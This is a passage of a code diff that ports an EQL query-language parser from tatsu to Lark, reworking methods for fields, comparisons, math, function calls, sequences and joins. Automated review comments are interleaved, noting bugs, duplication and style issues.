node["NAME"].value + if text in keywords: + raise self._error(node, "Invalid use of keyword", cls=EqlSyntaxError) + + return text + + def number(self, node): + """Parse a number with a sign.""" + token = node.children[-1] + if token.type == "UNSIGNED_INTEGER": + value = int(token) + else: + value = 
float(token) + + if int(value) == value: + value = int(value) + + if node["SIGN"] == "-": + return -value + return value + + def string(self, node): + value = node.children[0] + + # If a 'raw' string is detected, then only unescape the quote character + if value.startswith('?'): + quote_char = value[1] + return value[2:-1].replace("\\" + quote_char, quote_char) + else: + return ast.String.unescape(value[1:-1]) + + def base_field(self, node): + """Get a base field.""" + name = node["name"] + text = name["NAME"] + + if text in RESERVED: + value = RESERVED[text] return value, types.literal(value.type_hint) - path = self.walk(node.sub_fields) + # validate against the remaining keywords + name = self.visit(name) - if not path and node.base in self.preprocessor.constants: - constant = self.preprocessor.constants[node.base] + if name in self.preprocessor.constants: + constant = self.preprocessor.constants[name] return constant.value, types.literal(constant.value.type_hint) # Check if it's part of the current preprocessor that we are building # and if it is, then return it unexpanded but with a type hint - if not path and node.base in self.new_preprocessor.constants: - constant = self.new_preprocessor.constants[node.base] - return ast.Field(node.base), types.literal(constant.value.type_hint) + if name in self.new_preprocessor.constants: + constant = self.new_preprocessor.constants[name] + return ast.Field(name), types.literal(constant.value.type_hint) - field = ast.Field(node.base, path) - return self._get_field_hint(node, field, allow_enum=self._allow_enum) + field = ast.Field(name) + return self._get_field_hint(node, field) - # comparisons - def walk__equals(self, node): + def field(self, node): """Callback function to walk the AST.""" - # May be double or single equals - return '==' + full_path = [s.strip() for s in re.split(r"[.\[\]]+", node.children[0])] + full_path = [int(s) if s.isdigit() else s for s in full_path if s] - def walk__comparator(self, node): - """Walk 
comparators like <= < != == > >=.""" - return self.walk(node.comp) + if any(p in keywords for p in full_path): + raise self._error(node, "Invalid use of keyword", cls=EqlSyntaxError) - def walk__comparison(self, node): + base, path = full_path[0], full_path[1:] + + # if get_variable: + # if base_name in RESERVED or node.sub_fields: + # raise self._type_error(node, "Expected {expected_type} not {field} to function", types.VARIABLE) + # elif base_name in self._var_types: + # raise self._error(node, "Reuse of variable {base}") + + # # This can be overridden by the parent function that is parsing it + # return self._add_variable(node.base) + field = ast.Field(base, path) + return self._get_field_hint(node, field) + + def comparison(self, node): """Callback function to walk the AST.""" - left, left_type = self.walk(node.left) - right, right_type = self.walk(node.right) - op = self.walk(node.op) + (left, left_type), comp_op, (right, right_type) = self.visit_children(node) + + op = "==" if comp_op.type == 'EQUALS' else comp_op.value accepted_types = types.union(types.PRIMITIVES, types.NULL) error_message = "Unable to compare {expected_type} to {actual_type}" @@ -485,7 +549,7 @@ def walk__comparison(self, node): not types.check_types(accepted_types, left_type) or \ not types.check_types(accepted_types, right_type): # check if the types can actually be compared, and don't allow comparison of nested types - raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + raise self._type_error(node, error_message, types.clear(left_type), types.clear(right_type)) if op in (ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GE, ast.Comparison.GE): # check that <, <=, >, >= are only supported for strings or integers 
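Review bot: `field` carries a ten-line block of commented-out `get_variable` handling; the live replacement is `_add_variable` plus the `base_field` branch in `function_call`, so the dead block should be deleted rather than kept as a comment. In the same method, `int(s) if s.isdigit() else s` accepts Unicode digits (e.g. superscripts) that `int()` rejects with ValueError; `s.isdecimal()` matches what `int()` will parse. `_add_variable` and `string` have no docstrings; `"""Register *name* as a loop variable and return it as a Field with the VARIABLE hint."""` and `"""Strip quotes and unescape a string token; '?' prefixed strings only unescape their quote character."""` would cover them.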
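Review bot: The context line `if op in (ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GE, ast.Comparison.GE):` in `comparison` lists GE twice and never GT, so the string-or-number check for ordering operators is skipped for `>`; this predates the commit, but since the surrounding lines are being touched it is worth fixing to `(ast.Comparison.LT, ast.Comparison.LE, ast.Comparison.GT, ast.Comparison.GE)`. `comparison` continues outside this hunk.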
@@ -495,12 +559,12 @@ def walk__comparison(self, node): # string to string or number to number if not ((types.check_full_hint(types.STRING, lt) and types.check_full_hint(types.STRING, rt)) or (types.check_full_hint(types.NUMBER, lt) and types.check_full_hint(types.NUMBER, rt))): - raise self._type_error(node.op, error_message, types.clear(left_type), types.clear(right_type)) + raise self._type_error(node, error_message, types.clear(left_type), types.clear(right_type)) comp_node = ast.Comparison(left, op, right) hint = types.get_specifier(types.union(left_type, right_type)), types.get_type(types.BOOLEAN) - # there is no special comparator for wildcards, just look for * in the string + # there is no special comparison operator for wildcards, just look for * in the string if isinstance(right, ast.String) and '*' in right.value: func_call = ast.FunctionCall('wildcard', [left, right]) 
@@ -509,40 +573,91 @@ def walk__comparison(self, node): elif op == ast.Comparison.NE: return ~ func_call, hint - return comp_node, hint + return comp_node.optimize(), hint - def walk__and_terms(self, node): + def mathop(self, node): """Callback function to walk the AST.""" - terms, hints = self.walk(node.terms, split=True) + output, output_type = self.visit(node.children[0]) + + def update_type(error_node, new_op, new_type): + if not types.check_types(types.NUMBER, new_type): + raise self._type_error(error_node, "Unable to {func} {actual_type}", + types.NUMBER, new_type, func=ast.MathOperation.func_lookup[new_op]) + + output_spec = types.get_specifier(output_type) + + if types.check_types(types.NULL, types.union(output_type, new_type)): + return output_spec, types.union_types(types.BASE_NULL, types.BASE_NUMBER) + else: + return output_spec, types.BASE_NUMBER + + # update the type hint to strip non numeric information + output_type = update_type(node.children[0], node.children[1], output_type) + + for op_token, current_node in zip(node.children[1::2], node.children[2::2]): + op = op_token.value + right, current_hint = self.visit(current_node) + output_type = update_type(current_node, op, current_hint) + + # determine if this could have a null in it from a divide by 0 + if op in "%/" and (not isinstance(right, ast.Literal) or right.value == 0): + current_hint = types.union(current_hint, types.NULL) + + output = ast.MathOperation(output, op, right).optimize() + output_type = update_type(current_node, op, current_hint) + + if isinstance(output, ast.Literal): + output_type = types.get_specifier(output), output.type_hint + + return output, output_type + + sum_expr = mathop + mul_expr = mathop + + def bool_expr(self, node, cls): + """Method for both and, or expressions.""" + terms, hints = self.unzip_hints(self.visit_children(node)) + if not self._implied_booleans: - for tatsu_node, hint in zip(node.terms, hints): + for lark_node, hint in zip(node.child_trees, hints): if 
not types.check_types(types.BOOLEAN, hint): - raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", + raise self._type_error(lark_node, "Expected {expected_type}, not {actual_type}", types.BOOLEAN, hint) - term = ast.And(terms) + term = cls(terms).optimize() return term, types.union(*hints) - def walk__or_terms(self, node): + def and_expr(self, node): """Callback function to walk the AST.""" - terms, hints = self.walk(node.terms, split=True) - if not self._implied_booleans: - for tatsu_node, hint in zip(node.terms, hints): - if not types.check_types(types.BOOLEAN, hint): - raise self._type_error(tatsu_node, "Expected {expected_type}, not {actual_type}", - types.BOOLEAN, hint) - term = ast.Or(terms) - return term, types.union(*hints) + return self.bool_expr(node, ast.And) - def walk__not_term(self, node): + def or_expr(self, node): """Callback function to walk the AST.""" - term, hint = self.walk(node.t) - return ~ term, types.union(hint) + return self.bool_expr(node, ast.Or) - def walk__in_set(self, node): + def not_expr(self, node): """Callback function to walk the AST.""" - expr, outer_hint = self.walk(node.expr) - container, sub_hints = self.walk(node.container, keep_hint=True, split=True) + term, hint = self.visit(node.children[-1]) + + if not self._implied_booleans: + if not types.check_types(types.BOOLEAN, hint): + raise self._type_error(node.child_trees[-1], "Expected {expected_type}, not {actual_type}", + types.BOOLEAN, hint) + + if len(node.get_list("NOT_OP")) % 2 == 1: + term = ~ term + hint = types.get_specifier(hint), types.BASE_BOOLEAN + + return term, hint + + def not_in_set(self, node): + """Method for converting `x not in (...)`.""" + rv, rv_hint = self.in_set(node) + return ~(rv.optimize()), rv_hint + + def in_set(self, node): + """Callback function to walk the AST.""" + (expr, outer_hint), (container, sub_hints) = self.visit_children(node) outer_spec = types.get_specifier(outer_hint) outer_type = 
types.get_type(outer_hint) container_specifiers = [types.get_specifier(h) for h in sub_hints] @@ -550,12 +665,12 @@ def walk__in_set(self, node): # Check that everything inside the container has the same type as outside error_message = "Unable to compare {expected_type} to {actual_type}" - for container_node, node_type in zip(node.container, container_types): + for container_node, node_type in zip(node["expressions"].children, container_types): if not types.check_types(outer_type, node_type): raise self._type_error(container_node, error_message, outer_type, node_type) # This will always evaluate to true/false, so it should be a boolean - term = ast.InSet(expr, container) + term = ast.InSet(expr, container).optimize() return term, (types.union_specifiers(outer_spec, *container_specifiers), types.BASE_BOOLEAN) def _get_type_hint(self, node, ast_node): @@ -582,7 +697,7 @@ def _get_type_hint(self, node, ast_node): type_hint = types.union(type_hint, types.NULL) elif isinstance(ast_node, ast.FunctionCall): - signature = self._function_lookup.get(node.name) + signature = self._function_lookup.get(ast_node.name) if signature: type_hint = signature.return_value 
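Review bot: In `mathop` the loop calls `update_type(current_node, op, current_hint)` twice per operand: the first result is assigned to `output_type` and then overwritten by the second call after `current_hint` may have gained NULL, so the first call only serves as a type check while reading as if it computed something. Either drop the assignment on the first call (keep it as a bare validation call with a comment) or move the null-widening above a single call. The first `update_type(node.children[0], node.children[1], output_type)` passes the raw operator `Token` as `new_op`, whereas the loop passes `op_token.value`; `func_lookup[new_op]` works only while `Token` hashes like `str`, so pass `node.children[1].value` for consistency. `in_set` begins at the end of this hunk and continues outside it.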
@@ -591,30 +706,54 @@ def _get_type_hint(self, node, ast_node): return type_hint - def walk__function_call(self, node): + def function_call(self, node, prev_node=None, prev_arg=None): """Callback function to walk the AST.""" - if node.name in self.preprocessor.macros: - args = [] + function_name = self.visit(node["name"]) + argument_nodes = [] + args = [] + hints = [] + + # if the base is chained from a previous function call, use that node + if prev_arg: + base_arg, base_hint = prev_arg + args.append(base_arg) + hints.append(base_hint) + + if prev_node: + argument_nodes.append(prev_node) - if node.args: - args, hints = self.walk(node.args, split=True) + if "expressions" in node: + argument_nodes.extend(node["expressions"].children) - macro = self.preprocessor.macros[node.name] + if function_name in self.preprocessor.macros: + if prev_node and not prev_arg: + arg, hint = self.visit(prev_node) + args.append(arg) + hints.append(hint) + + if node["expressions"]: + args[len(args):], hints[len(hints):] = self.visit(node["expressions"]) + + macro = self.preprocessor.macros[function_name] expanded = macro.expand(args) type_hint = self._get_type_hint(node, expanded) return expanded, type_hint - elif node.name in self.new_preprocessor.macros: - args = [] + elif function_name in self.new_preprocessor.macros: + if prev_node and not prev_arg: + arg, hint = self.visit(prev_node) + args.append(arg) + hints.append(hint) + + if node["expressions"]: + args[len(args):], hints[len(hints):] = self.visit(node["expressions"]) - if node.args: - args, hints = self.walk(node.args, split=True) - macro = self.new_preprocessor.macros[node.name] + macro = self.new_preprocessor.macros[function_name] expanded = macro.expand(args) type_hint = self._get_type_hint(node, expanded) return expanded, type_hint - signature = self._function_lookup.get(node.name) + signature = self._function_lookup.get(function_name) if signature: # Check for any variables in the signature, and handle their type hints 
differently @@ -627,33 +766,29 @@ def walk__function_call(self, node): # Get all of the arguments first, because they may depend on others # and we need to pull out all of the variables - for idx, arg_node in enumerate(node.args or []): - if idx in variables: - exc = self._type_error(arg_node, "Invalid argument to {name}. Expected {expected_type}", - types.VARIABLE, name=node.name) - - if arg_node.parseinfo.rule == 'field': - try: - arguments.append(self.walk(arg_node, get_variable=True)) - except EqlTypeMismatchError: - pass - else: - continue - - # Ignore the original exception and raise our own, which has the function name in it - raise exc + for idx, arg_node in enumerate(argument_nodes): + if idx in variables: + if arg_node.data == "base_field": + variable_name = self.visit(arg_node["name"]) + self._add_variable(variable_name) + arguments.append((ast.Field(variable_name), types.VARIABLE)) + else: + raise self._type_error(arg_node, "Invalid argument to {name}. Expected {expected_type}", + types.VARIABLE, name=function_name) + elif idx == 0 and prev_arg: + arguments.append(prev_arg) else: - arguments.append(self.walk(arg_node)) + arguments.append(self.visit(arg_node)) # Then validate this against the signature - args, hints = transpose(arguments) + args, hints = self.unzip_hints(arguments) # In theory, we could do another round of validation for generics, but we'll just assume # that loop variables can take any shape they need to, as long as the other arguments match # Validate that the arguments match the function signature by type and length - args, hints = self.validate_signature(node, signature, args, hints) + args, hints = self.validate_signature(node, signature, argument_nodes, args, hints) # Restore old variables, since ours are out of scope now self._var_types = old_variables 
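Review bot: The two macro branches of `function_call` (`self.preprocessor.macros` and `self.new_preprocessor.macros`) are byte-for-byte identical apart from the lookup dict; a single `macro = self.preprocessor.macros.get(function_name) or self.new_preprocessor.macros.get(function_name)` followed by one expansion block removes the duplication. `args[len(args):], hints[len(hints):] = self.visit(node["expressions"])` is an obscure way to extend two lists; `more_args, more_hints = self.visit(node["expressions"])` with `args.extend(more_args)` / `hints.extend(more_hints)` says the same thing. The same hunk tests the argument list as `"expressions" in node` in one place and `node["expressions"]` in the others; pick one idiom. `function_call` continues past this hunk.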
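Review bot: The variable branch of `function_call` no longer rejects reuse of an already-bound name: the removed `walk__field` raised "Reuse of variable {base}" when `node.base in self._var_types`, while `_add_variable` silently overwrites `self._var_types[name]`, so a loop variable shadowing an outer one is now accepted. Restoring `if variable_name in self._var_types: raise self._error(arg_node, "Reuse of variable {NAME}")` before `_add_variable` keeps the old check (the `{NAME}` key assumes the `base_field` node carries a NAME token as `base_field` reads it). `_add_variable` already returns `(ast.Field(name), types.VARIABLE)`, so `arguments.append(self._add_variable(variable_name))` replaces the rebuilt tuple. The enclosing loop's function starts and ends outside this hunk.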
@@ -664,61 +799,77 @@ def walk__function_call(self, node): if hints and types.is_dynamic(types.union(*hints)): output_hint = types.dynamic(output_hint) - return ast.FunctionCall(node.name, args), output_hint + return ast.FunctionCall(function_name, args, as_method=prev_node is not None), output_hint elif self._check_functions: - raise self._error(node, "Unknown function {name}", width=len(node.name)) + raise self._error(node["name"], "Unknown function {NAME}") else: args = [] - if node.args: - args, _ = self.walk(node.args, split=True) + if node["expressions"]: + args, _ = self.visit(node["expressions"]) - return ast.FunctionCall(node.name, args), types.dynamic(types.EXPRESSION) + func_node = ast.FunctionCall(function_name, args, as_method=prev_node is not None) + return func_node, types.dynamic(types.EXPRESSION) # queries - def walk__event_query(self, node): + def event_query(self, node): """Callback function to walk the AST.""" - if node.ast.get('event_type') is None: + if node["name"] is None: event_type = EVENT_TYPE_ANY if not self.implied_any: raise self._error(node, "Missing event type and 'where' condition") else: - event_type = node.event_type + event_type = self.visit(node["name"]) if self._schema and not self._schema.validate_event_type(event_type): - raise self._error(node, "Invalid event type: {event_type}", cls=EqlSchemaError, width=len(event_type)) + raise self._error(node["name"], "Invalid event type: {NAME}", cls=EqlSchemaError, width=len(event_type)) + + with self.scoped(event_type=event_type, query_condition=True): + expr, hint = self.visit(node.children[-1]) + if not self._implied_booleans and not types.check_types(types.BOOLEAN, hint): + raise self._type_error(node.children[-1], "Expected {expected_type} not {actual_type}", + types.BOOLEAN, hint) - condition = self.walk(node.cond, event_type=event_type, query_condition=True) - return ast.EventQuery(event_type, condition) + return ast.EventQuery(event_type, expr) - def walk__pipe(self, node): + 
def pipe(self, node): """Callback function to walk the AST.""" if not self._pipes_enabled: raise self._error(node, "Pipes not supported") - pipe_cls = ast.PipeCommand.lookup.get(node.name) - if pipe_cls is None or node.name not in self._allowed_pipes: - raise self._error(node, "Unknown pipe {name}", width=len(node.name)) + pipe_name = self.visit(node["name"]) + pipe_cls = ast.PipeCommand.lookup.get(pipe_name) + if pipe_cls is None or pipe_name not in self._allowed_pipes: + raise self._error(node["name"], "Unknown pipe {NAME}") args = [] hints = [] + arg_nodes = [] - if node.args: - args, hints = self.walk(node.args, split=True) + if node["expressions"]: + arg_nodes = node["expressions"].children + args, hints = self.visit(node["expressions"]) + elif len(node.children) > 1: + arg_nodes = node.children[1:] + args, hints = self.unzip_hints(self.visit(c) for c in node.children[1:]) - args, hints = self.validate_signature(node, pipe_cls, args, hints) + args, hints = self.validate_signature(node, pipe_cls, arg_nodes, args, hints) self._pipe_schemas = pipe_cls.output_schemas(args, hints, self._pipe_schemas) return pipe_cls(args) - def walk__piped_query(self, node): + def base_query(self, node): + """Visit a sequence, join or event query.""" + return self.visit(node.children[0]) + + def piped_query(self, node): """Callback function to walk the AST.""" - if node.query is None: + if "base_query" in node: + first = self.visit(node["base_query"]) + elif self.implied_base: first = ast.EventQuery(EVENT_TYPE_ANY, ast.Boolean(True)) - if not self.implied_base: - raise self._error(node, "Missing base query") else: - first = self.walk(node.query) + raise self._error(node, "Missing base query") self._in_pipes = True if isinstance(first, ast.EventQuery): 
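Review bot: The final `else` branch of `function_call` (unknown function with `_check_functions` off) builds the argument list from `node["expressions"]` alone, yet marks the call `as_method=prev_node is not None`; unlike the macro and signature branches it never adds `prev_arg` or visits `prev_node`, so a chained call such as `x.unknown(1)` loses its receiver unless `as_method` consumers re-attach it elsewhere. The branch should mirror the other two and prepend the receiver before the explicit arguments. `function_call` begins outside this hunk.
```python
        else:
            args = []
            # keep the chained receiver as the first argument, as the other branches do
            if prev_arg:
                args.append(prev_arg[0])
            elif prev_node:
                receiver, _ = self.visit(prev_node)
                args.append(receiver)
            if node["expressions"]:
                extra, _ = self.visit(node["expressions"])
                args.extend(extra)
            # … unchanged: FunctionCall construction with as_method …
```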
@@ -736,63 +887,82 @@ def walk__piped_query(self, node): else: self._pipe_schemas.append(Schema({EVENT_TYPE_GENERIC: {}})) - return ast.PipedQuery(first, self.walk(node.pipes)) + return ast.PipedQuery(first, self.visit_children(node["pipes"])) + + def expressions(self, node): + """Convert a list of expressions.""" + expressions = self.visit_children(node) + # Split out return types and the hints + return self.unzip_hints(expressions) + + def named_subquery(self, node): + """Callback function to walk the AST.""" + name = self.visit(node["name"]) - def walk__subquery_type(self, node): - """Get the subquery type.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") elif self._in_pipes: raise self._error(node, "Not supported within pipe") + elif name not in ast.NamedSubquery.supported_types: + raise self._error(node["name"], "Unknown subquery type '{NAME} of'") - if node.name not in ast.NamedSubquery.supported_types: - raise self._error(node, "Unknown subquery type '{name} of'") + query = self.visit(node["subquery"]["event_query"]) + return ast.NamedSubquery(name, query), types.dynamic(types.BOOLEAN) - return node.name - - def walk__named_query(self, node): + def named_params(self, node, get_param=None, position=None, close=None): """Callback function to walk the AST.""" - return ast.NamedSubquery(self.walk(node.stype), self.walk(node.query)), types.dynamic(types.BOOLEAN) + if node is None: + return ast.NamedParams({}) - def walk__named_params(self, node, get_param=None, position=None, close=None): - """Callback function to walk the AST.""" params = OrderedDict() - if get_param is None and len(node.params) > 0: - raise self._error(node, "Unexpected parameters") + if get_param is None and len(node.children) > 0: + raise self._error(node.children[0], "Unexpected parameters") - for param in node.params: + for param in node.children: key, value = get_param(param, position=position, close=close) if key in params: - raise self._error(param, 
"Repeated parameter {k}") + raise self._error(param, "Repeated parameter {name}") params[key] = value return ast.NamedParams(params) - def walk__subquery_by(self, node, num_values=None, position=None, close=None, get_param=None): + def subquery_by(self, node, num_values=None, position=None, close=None, get_param=None): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") - if num_values is not None and num_values != len(node.join_values): - if len(node.join_values) == 0: - error_node = node.query + actual_num = len(node["join_values"]["expressions"].children) if node["join_values"] else 0 + if num_values is not None and num_values != actual_num: + if actual_num == 0: + error_node = node end = True else: end = False - error_node = node.join_values[max(num_values, len(node.join_values)) - 1] + error_node = node["join_values"]["expressions"].children[max(num_values, actual_num) - 1] message = "Expected {num} value" if num_values != 1: message += "s" raise self._error(error_node, message, num=num_values, end=end) - params = self.walk(node.params, get_param=get_param, position=position, close=close) - query = self.walk(node.query) - if node.join_values: - join_values, join_hints = self.walk(node.join_values, event_type=query.event_type, split=True) + if node["named_params"]: + params = self.named_params(node["named_params"], + get_param=get_param, position=position, close=close) + else: + params = ast.NamedParams() + + query = self.visit(node["subquery"]["event_query"]) + + if node["join_values"]: + with self.scoped(event_type=query.event_type): + join_values, join_hints = self.visit(node["join_values"]) else: join_values, join_hints = [], [] return ast.SubqueryBy(query, params, join_values), join_hints - def walk__join(self, node): + def join_values(self, node): + """Return all of the expressions.""" + return self.visit(node["expressions"]) + + def join(self, node): """Callback function to walk 
the AST.""" queries, close = self._get_subqueries_and_close(node) return ast.Join(queries, close) @@ -804,14 +974,15 @@ def _get_subqueries_and_close(self, node, get_param=None): raise self._error(node, "Subqueries not supported") # Figure out how many fields are joined by in the first query, and match across all - first, first_hints = self.walk(node.queries[0], get_param=get_param, position=0) + subquery_nodes = node.get_list("subquery_by") + first, first_hints = self.subquery_by(subquery_nodes[0], get_param=get_param, position=0) num_values = len(first.join_values) queries = [(first, first_hints)] - for pos, query in enumerate(node.queries[1:], 1): - queries.append(self.walk(query, num_values=num_values, get_param=get_param, position=pos)) + for pos, query in enumerate(subquery_nodes[1:], 1): + queries.append(self.subquery_by(query, num_values=num_values, get_param=get_param, position=pos)) - shared = node.ast.get('shared_by') + shared = node['join_values'] close = None # Validate that each field has matching types @@ -819,7 +990,7 @@ def _get_subqueries_and_close(self, node, get_param=None): strict_hints = [default_hint] * num_values if shared: - strict_hints += [default_hint] * len(shared) + strict_hints += [default_hint] * len(shared["expressions"].children) def check_by_field(by_pos, by_node, by_hint): # Check that the possible values for our field that match what we currently understand about this type 
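Review bot: `named_params` returns `ast.NamedParams({})` for a missing node while `subquery_by` builds `ast.NamedParams()` in the same situation; if the constructor's default differs from `{}` the two paths produce different nodes, and in any case `subquery_by` can just call `self.named_params(node["named_params"], ...)` unconditionally since that method already handles `None`. `subquery_by` spells out `node["join_values"]["expressions"].children` three times; binding it once (`join_nodes = node["join_values"]["expressions"].children if node["join_values"] else []`) makes the count and the error-node index read from the same list. `join` starts at the end of this hunk and continues outside it.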
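Review bot: `shared = node['join_values']` (and `shared['expressions']` in the two later hunks of `_get_subqueries_and_close`) uses single-quoted keys while every other tree lookup in this patch is written `node["..."]`; a consistent quote style makes the tree-key accesses greppable. `_get_subqueries_and_close` starts and ends outside this hunk.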
@@ -834,13 +1005,20 @@ def check_by_field(by_pos, by_node, by_hint): for qpos, (query, query_by_hints) in enumerate(queries): unshared_fields = [] curr_by_hints = query_by_hints - curr_join_nodes = node.queries[qpos].join_values + query_node = subquery_nodes[qpos] + + if "join_values" in query_node: + curr_join_nodes = query_node["join_values"]["expressions"].children + else: + curr_join_nodes = [] if shared: - curr_shared_by, curr_shared_hints = self.walk(shared, event_type=query.query.event_type, split=True) + with self.scoped(event_type=query.query.event_type): + curr_shared_by, curr_shared_hints = self.visit(shared) + curr_by_hints = curr_shared_hints + curr_by_hints query.join_values = curr_shared_by + query.join_values - curr_join_nodes = shared + curr_join_nodes + curr_join_nodes = shared['expressions'].children + curr_join_nodes # Now that they've all been built out, start to intersect the types for fpos, (n, h) in enumerate(zip(curr_join_nodes, curr_by_hints)): 
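Review bot: The presence test `if "join_values" in query_node:` differs from the `if node["join_values"]:` form used for the same key in `subquery_by`; if `KvTree.__getitem__` returns None for an absent key, `curr_join_nodes = query_node["join_values"]["expressions"].children if query_node["join_values"] else []` expresses the same thing in one line and matches the rest of the file. `_get_subqueries_and_close` starts and ends outside this hunk.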
@@ -849,34 +1027,45 @@ def check_by_field(by_pos, by_node, by_hint): # Add all of the fields to the beginning of this subquery's BY fields and preserve the order query.join_values = unshared_fields + query.join_values - if node.ast.get("until"): - close, close_hints = self.walk(node.until, num_values=num_values, get_param=get_param, close=True) - close_nodes = [node.until] + until_node = node["until_subquery_by"] + + if until_node: + close, close_hints = self.subquery_by(until_node["subquery_by"], + num_values=num_values, get_param=get_param, close=True) + close_nodes = [until_node["subquery_by"]] if shared: - shared_by, shared_hints = self.walk(node.shared_by, event_type=close.query.event_type, split=True) + with self.scoped(event_type=close.query.event_type): + shared_by, shared_hints = self.visit(shared) + close_hints = close_hints + shared_hints close.join_values = shared_by + close.join_values - close_nodes = shared + close_nodes + close_nodes = shared['expressions'].children + close_nodes # Check the types of the by field for fpos, (n, h) in enumerate(zip(close_nodes, close_hints)): check_by_field(fpos, n, h) # Unzip the queries from the (query, hint) tuples - queries, _ = zip(*queries) + queries, _ = self.unzip_hints(queries) return list(queries), close def get_sequence_parameter(self, node, **kwargs): """Validate that sequence parameters are working.""" - key, (value, value_hint) = self.walk([node.k, node.v]) - value = ast.TimeRange.convert(value) + key = self.visit(node["name"]) + + if len(node.children) > 1: + value, _ = self.visit(node.children[-1]) + else: + value = ast.Boolean(True) if key != 'maxspan': raise self._error(node, "Unknown sequence parameter {}".format(key)) - if not ast.TimeRange.convert(value) or value.delta < datetime.timedelta(0): - error_node = node.v if isinstance(node.v, tatsu.objectmodel.Node) else node + value = ast.TimeRange.convert(value) + + if not value or value.delta < datetime.timedelta(0): + error_node = node["time_range"] 
or node["atom"] or node raise self._error(error_node, "Invalid value for {}".format(key)) return key, value @@ -888,9 +1077,10 @@ def get_sequence_term_parameter(self, param_node, position, close): # set the default type to a literal 'true' value, type_hint = ast.Boolean(True), types.literal(types.BOOLEAN) - key = self.walk(param_node.k) - if param_node.ast.get('v'): - value, type_hint = self.walk(param_node.v) + key = self.visit(param_node["name"]) + + if len(param_node.children) > 1: + value, type_hint = self.visit(param_node.children[-1]) if key == 'fork': if not types.check_types(types.literal((types.NUMBER, types.BOOLEAN)), type_hint): 
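Review bot: In `get_sequence_parameter`, `raise self._error(node, "Unknown sequence parameter {}".format(key))` still reports against the whole parameter node, while the parallel change in `get_sequence_term_parameter` (the `@@ -902` hunk) narrows the unknown-parameter error to `param_node['name']`; using `node["name"]` here keeps the two diagnostics consistent. The no-value branch is also non-obvious: a bare parameter becomes `ast.Boolean(True)`, which is then handed to `ast.TimeRange.convert` and rejected on the `if not value` line, so a comment such as `# a parameter written without a value falls through to TimeRange.convert and is rejected below` would save the next reader from tracing it. `get_sequence_parameter` is shown in full, but the hunk opens inside `_get_subqueries_and_close`, which starts outside it.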
@@ -902,58 +1092,49 @@ def get_sequence_term_parameter(self, param_node, position, close): raise self._error(param_node, "Invalid value for {k}") else: - raise self._error(param_node, "Unknown parameter {k}") + raise self._error(param_node['name'], "Unknown parameter {NAME}") return key, ast.Boolean(bool(value.value)) - def walk__sequence(self, node): + def sequence(self, node): """Callback function to walk the AST.""" if not self._subqueries_enabled: raise self._error(node, "Subqueries not supported") params = None - if node.ast.get('params'): - params = self.walk(node.params, get_param=self.get_sequence_parameter) + if node['named_params']: + params = self.named_params(node['named_params'], get_param=self.get_sequence_parameter) queries, close = self._get_subqueries_and_close(node, get_param=self.get_sequence_term_parameter) return ast.Sequence(queries, params, close) + def definitions(self, node): + """Parse all definitions.""" + return self.visit_children(node) + # definitions - def walk__macro(self, node): + def macro(self, node): """Callback function to walk the AST.""" - definition = ast.Macro(node.name, node.params, self.walk(node.body)) + definition = ast.Macro(self.visit(node.children[0]), + self.visit(node.children[1:-1]), + self.visit(node.children[-1])[0]) self.new_preprocessor.add_definition(definition) return definition - def walk__constant(self, node): + def constant(self, node): """Callback function to walk the AST.""" - value, _ = self.walk(node.value) - definition = ast.Constant(node.name, value) + name = self.visit(node["name"]) + value, _ = self.visit(node["literal"]) + definition = ast.Constant(name, value) self.new_preprocessor.add_definition(definition) return definition -def _build_parser(): - """Build a parser one-time. 
These appear to be thread-safe so this only needs to happen once.""" - global GRAMMAR, compiled_parser - - if compiled_parser is not None: - return compiled_parser - - with compiler_lock: - if compiled_parser is None: - GRAMMAR = get_etc_file('eql.ebnf') - compiled_parser = tatsu.compile(GRAMMAR, parseinfo=True, semantics=tatsu.semantics.ModelBuilderSemantics()) - - return compiled_parser - - -def _get_parser(): - """Try to get a thread-safe parser, and compile if necessary.""" - if not hasattr(local, "parser"): - local.parser = _build_parser() - return local.parser +lark_parser = Lark(get_etc_file('eql.g'), debug=False, + propagate_positions=True, tree_class=KvTree, parser='lalr', + start=['piped_query', 'definition', 'definitions', + 'query_with_definitions', 'expr', 'signed_single_atom']) def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base=False, pipes=True, subqueries=True): 
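Review bot: `raise self._error(param_node, "Invalid value for {k}")`, left as context two lines above the changed `raise`, still uses the `{k}` placeholder that named the old tatsu attribute, while the changed line switched to `{NAME}`; unless `_error` resolves both keys from the node, one of these messages will render with an unfilled placeholder, so both should use the same node (`param_node['name']`) and key. Separately, `lark_parser = Lark(get_etc_file('eql.g'), ...)` moves grammar loading from the lazily-built, lock-guarded `_build_parser` to module import time, so importing `eql.parser` now reads and compiles the grammar even when nothing is parsed; if that is intended, a comment such as `# built eagerly at import time and shared by every _parse call` records the decision so the lazy path is not reintroduced. In `macro`, `self.visit(node.children[1:-1])` visits a list rather than a single node; a short comment on what `visit` returns for a list would make the `[0]` on the next line easier to follow.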
@@ -970,53 +1151,43 @@ def _parse(text, start=None, preprocessor=None, implied_any=False, implied_base= :param PreProcessor preprocessor: Optional preprocessor to expand definitions and constants :rtype: EqlNode """ - parser = _get_parser() - if not text.strip(): raise EqlParseError("No text specified", 0, 0, text) # Convert everything to unicode text = to_unicode(text) + if not text.endswith("\n"): + text += "\n" with ParserConfig(implied_any=implied_any, implied_base=implied_base, allow_subqueries=subqueries, preprocessor=preprocessor, allow_pipes=pipes) as cfg: - walker = EqlWalker() load_extensions(force=False) exc = None + walker = LarkToEQL(text) try: - model = parser.parse(text, rule_name=start, start=start, parseinfo=True) - eql_node = walker.walk(model) - if not isinstance(eql_node, ast.EqlNode) and isinstance(eql_node, tuple): - eql_node, type_hint = eql_node - return eql_node - except EqlError as e: - # If full traceback mode is enabled, then re-raise the exception + tree = lark_parser.parse(text, start=start) + except LarkError as e: + # Remove the original exception from the traceback + exc = EqlSyntaxError("Invalid syntax", e.line - 1, e.column - 1, '\n'.join(walker.lines[e.line - 2:e.line])) if cfg.read_stack("full_traceback", debugger_attached): - raise - exc = e - except tatsu.exceptions.FailedParse as e: - # Remove the tatsu exception from the traceback - exc = e - - if isinstance(exc, EqlError): - # at this point, the full traceback isn't wanted, so raise it from here - raise exc + raise exc - if isinstance(exc, 